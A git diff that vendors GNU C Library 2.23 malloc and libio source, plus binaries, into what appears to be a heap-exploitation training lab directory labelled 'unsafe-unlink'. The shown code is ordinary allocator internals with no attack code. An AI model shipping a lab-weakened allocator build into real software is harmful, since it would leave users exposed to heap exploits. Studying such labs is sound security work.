+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+        return chunksize (p) - 2 * SIZE_SZ;
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = mp_.max_total_mem;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      (void) mutex_unlock (&ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  (void) mutex_lock (&av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      LIBC_PROBE (memory_mallopt_trim_threshold, 3, value,
+                  mp_.trim_threshold, mp_.no_dyn_threshold);
+      mp_.trim_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_TOP_PAD:
+      LIBC_PROBE (memory_mallopt_top_pad, 3, value,
+                  mp_.top_pad, mp_.no_dyn_threshold);
+      mp_.top_pad = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_MMAP_THRESHOLD:
+      /* Forbid setting the threshold too high. */
+      if ((unsigned long) value > HEAP_MAX_SIZE / 2)
+        res = 0;
+      else
+        {
+          LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value,
+                      mp_.mmap_threshold, mp_.no_dyn_threshold);
+          mp_.mmap_threshold = value;
+          mp_.no_dyn_threshold = 1;
+        }
+      break;
+
+    case M_MMAP_MAX:
+      LIBC_PROBE (memory_mallopt_mmap_max, 3, value,
+                  mp_.n_mmaps_max, mp_.no_dyn_threshold);
+      mp_.n_mmaps_max = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_CHECK_ACTION:
+      LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+      check_action = value;
+      break;
+
+    case M_PERTURB:
+      LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+      perturb_byte = value;
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+          mp_.arena_test = value;
+        }
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+          mp_.arena_max = value;
+        }
+      break;
+    }
+  (void) mutex_unlock (&av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message (action & 2, "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      mutex_lock (&ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r->size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r->size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r->size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      mutex_unlock (&ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __cfree) weak_alias (__libc_free, cfree)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+weak_alias (__malloc_get_state, malloc_get_state)
+weak_alias (__malloc_set_state, malloc_set_state)
+
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld-2.23.so b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld-2.23.so
new file mode 100755
index 0000000..6000149
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld-2.23.so differ
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld.so.2 b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld.so.2
new file mode 120000
index 0000000..6a23928
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld.so.2
@@ -0,0 +1 @@
+ld-2.23.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc-2.23.so b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc-2.23.so
new file mode 100755
index 0000000..df092a0
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc-2.23.so differ
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc.so.6 b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc.so.6
new file mode 120000
index 0000000..a42d666
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc.so.6
@@ -0,0 +1 @@
+libc-2.23.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libio/genops.c b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libio/genops.c
new file mode 100644
index 0000000..5803cbf
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libio/genops.c
@@ -0,0 +1,1253 @@
+/* Copyright (C) 1993-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public
+   License as published by the Free Software Foundation; either
+   version 2.1 of the License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; if not, see
+   <http://www.gnu.org/licenses/>.
+
+   As a special exception, if you link the code in this file with
+   files compiled with a GNU compiler to produce an executable,
+   that does not cause the resulting executable to be covered by
+   the GNU Lesser General Public License.  This exception does not
+   however invalidate any other reasons why the executable file
+   might be covered by the GNU Lesser General Public License.
+   This exception applies to code released by its copyright holders
+   in files containing the exception.  */
+
+/* Generic or default I/O operations. */
+
+#include "libioP.h"
+#include <stdlib.h>
+#include <string.h>
+#include <stdbool.h>
+#ifdef _LIBC
+#include <sched.h>
+#endif
+
+#ifdef _IO_MTSAFE_IO
+static _IO_lock_t list_all_lock = _IO_lock_initializer;
+#endif
+
+/* Used to signal modifications to the list of FILE decriptors.  */
+static int _IO_list_all_stamp;
+
+
+static _IO_FILE *run_fp;
+
+#ifdef _IO_MTSAFE_IO
+static void
+flush_cleanup (void *not_used)
+{
+  if (run_fp != NULL)
+    _IO_funlockfile (run_fp);
+  _IO_lock_unlock (list_all_lock);
+}
+#endif
+
+void
+_IO_un_link (struct _IO_FILE_plus *fp)
+{
+  if (fp->file._flags & _IO_LINKED)
+    {
+      struct _IO_FILE **f;
+#ifdef _IO_MTSAFE_IO
+      _IO_cleanup_region_start_noarg (flush_cleanup);
+      _IO_lock_lock (list_all_lock);
+      run_fp = (_IO_FILE *) fp;
+      _IO_flockfile ((_IO_FILE *) fp);
+#endif
+      if (_IO_list_all == NULL)
+	;
+      else if (fp == _IO_list_all)
+	{
+	  _IO_list_all = (struct _IO_FILE_plus *) _IO_list_all->file._chain;
+	  ++_IO_list_all_stamp;
+	}
+      else
+	for (f = &_IO_list_all->file._chain; *f; f = &(*f)->_chain)
+	  if (*f == (_IO_FILE *) fp)
+	    {
+	      *f = fp->file._chain;
+	      ++_IO_list_all_stamp;
+	      break;
+	    }
+      fp->file._flags &= ~_IO_LINKED;
+#ifdef _IO_MTSAFE_IO
+      _IO_funlockfile ((_IO_FILE *) fp);
+      run_fp = NULL;
+      _IO_lock_unlock (list_all_lock);
+      _IO_cleanup_region_end (0);
+#endif
+    }
+}
+libc_hidden_def (_IO_un_link)
+
+void
+_IO_link_in (struct _IO_FILE_plus *fp)
+{
+  if ((fp->file._flags & _IO_LINKED) == 0)
+    {
+      fp->file._flags |= _IO_LINKED;
+#ifdef _IO_MTSAFE_IO
+      _IO_cleanup_region_start_noarg (flush_cleanup);
+      _IO_lock_lock (list_all_lock);
+      run_fp = (_IO_FILE *) fp;
+      _IO_flockfile ((_IO_FILE *) fp);
+#endif
+      fp->file._chain = (_IO_FILE *) _IO_list_all;
+      _IO_list_all = fp;
+      ++_IO_list_all_stamp;
+#ifdef _IO_MTSAFE_IO
+      _IO_funlockfile ((_IO_FILE *) fp);
+      run_fp = NULL;
+      _IO_lock_unlock (list_all_lock);
+      _IO_cleanup_region_end (0);
+#endif
+    }
+}
+libc_hidden_def (_IO_link_in)
+
+/* Return minimum _pos markers
+   Assumes the current get area is the main get area. */
+_IO_ssize_t _IO_least_marker (_IO_FILE *fp, char *end_p);
+
+_IO_ssize_t
+_IO_least_marker (_IO_FILE *fp, char *end_p)
+{
+  _IO_ssize_t least_so_far = end_p - fp->_IO_read_base;
+  struct _IO_marker *mark;
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    if (mark->_pos < least_so_far)
+      least_so_far = mark->_pos;
+  return least_so_far;
+}
+
+/* Switch current get area from backup buffer to (start of) main get area. */
+
+void
+_IO_switch_to_main_get_area (_IO_FILE *fp)
+{
+  char *tmp;
+  fp->_flags &= ~_IO_IN_BACKUP;
+  /* Swap _IO_read_end and _IO_save_end. */
+  tmp = fp->_IO_read_end;
+  fp->_IO_read_end = fp->_IO_save_end;
+  fp->_IO_save_end= tmp;
+  /* Swap _IO_read_base and _IO_save_base. */
+  tmp = fp->_IO_read_base;
+  fp->_IO_read_base = fp->_IO_save_base;
+  fp->_IO_save_base = tmp;
+  /* Set _IO_read_ptr. */
+  fp->_IO_read_ptr = fp->_IO_read_base;
+}
+
+/* Switch current get area from main get area to (end of) backup area. */
+
+void
+_IO_switch_to_backup_area (_IO_FILE *fp)
+{
+  char *tmp;
+  fp->_flags |= _IO_IN_BACKUP;
+  /* Swap _IO_read_end and _IO_save_end. */
+  tmp = fp->_IO_read_end;
+  fp->_IO_read_end = fp->_IO_save_end;
+  fp->_IO_save_end = tmp;
+  /* Swap _IO_read_base and _IO_save_base. */
+  tmp = fp->_IO_read_base;
+  fp->_IO_read_base = fp->_IO_save_base;
+  fp->_IO_save_base = tmp;
+  /* Set _IO_read_ptr.  */
+  fp->_IO_read_ptr = fp->_IO_read_end;
+}
+
+int
+_IO_switch_to_get_mode (_IO_FILE *fp)
+{
+  if (fp->_IO_write_ptr > fp->_IO_write_base)
+    if (_IO_OVERFLOW (fp, EOF) == EOF)
+      return EOF;
+  if (_IO_in_backup (fp))
+    fp->_IO_read_base = fp->_IO_backup_base;
+  else
+    {
+      fp->_IO_read_base = fp->_IO_buf_base;
+      if (fp->_IO_write_ptr > fp->_IO_read_end)
+	fp->_IO_read_end = fp->_IO_write_ptr;
+    }
+  fp->_IO_read_ptr = fp->_IO_write_ptr;
+
+  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = fp->_IO_read_ptr;
+
+  fp->_flags &= ~_IO_CURRENTLY_PUTTING;
+  return 0;
+}
+libc_hidden_def (_IO_switch_to_get_mode)
+
+void
+_IO_free_backup_area (_IO_FILE *fp)
+{
+  if (_IO_in_backup (fp))
+    _IO_switch_to_main_get_area (fp);  /* Just in case. */
+  free (fp->_IO_save_base);
+  fp->_IO_save_base = NULL;
+  fp->_IO_save_end = NULL;
+  fp->_IO_backup_base = NULL;
+}
+libc_hidden_def (_IO_free_backup_area)
+
+#if 0
+int
+_IO_switch_to_put_mode (_IO_FILE *fp)
+{
+  fp->_IO_write_base = fp->_IO_read_ptr;
+  fp->_IO_write_ptr = fp->_IO_read_ptr;
+  /* Following is wrong if line- or un-buffered? */
+  fp->_IO_write_end = (fp->_flags & _IO_IN_BACKUP
+		       ? fp->_IO_read_end : fp->_IO_buf_end);
+
+  fp->_IO_read_ptr = fp->_IO_read_end;
+  fp->_IO_read_base = fp->_IO_read_end;
+
+  fp->_flags |= _IO_CURRENTLY_PUTTING;
+  return 0;
+}
+#endif
+
+int
+__overflow (_IO_FILE *f, int ch)
+{
+  /* This is a single-byte stream.  */
+  if (f->_mode == 0)
+    _IO_fwide (f, -1);
+  return _IO_OVERFLOW (f, ch);
+}
+libc_hidden_def (__overflow)
+
+static int save_for_backup (_IO_FILE *fp, char *end_p)
+#ifdef _LIBC
+     internal_function
+#endif
+     ;
+
+static int
+#ifdef _LIBC
+internal_function
+#endif
+save_for_backup (_IO_FILE *fp, char *end_p)
+{
+  /* Append [_IO_read_base..end_p] to backup area. */
+  _IO_ssize_t least_mark = _IO_least_marker (fp, end_p);
+  /* needed_size is how much space we need in the backup area. */
+  _IO_size_t needed_size = (end_p - fp->_IO_read_base) - least_mark;
+  /* FIXME: Dubious arithmetic if pointers are NULL */
+  _IO_size_t current_Bsize = fp->_IO_save_end - fp->_IO_save_base;
+  _IO_size_t avail; /* Extra space available for future expansion. */
+  _IO_ssize_t delta;
+  struct _IO_marker *mark;
+  if (needed_size > current_Bsize)
+    {
+      char *new_buffer;
+      avail = 100;
+      new_buffer = (char *) malloc (avail + needed_size);
+      if (new_buffer == NULL)
+	return EOF;		/* FIXME */
+      if (least_mark < 0)
+	{
+#ifdef _LIBC
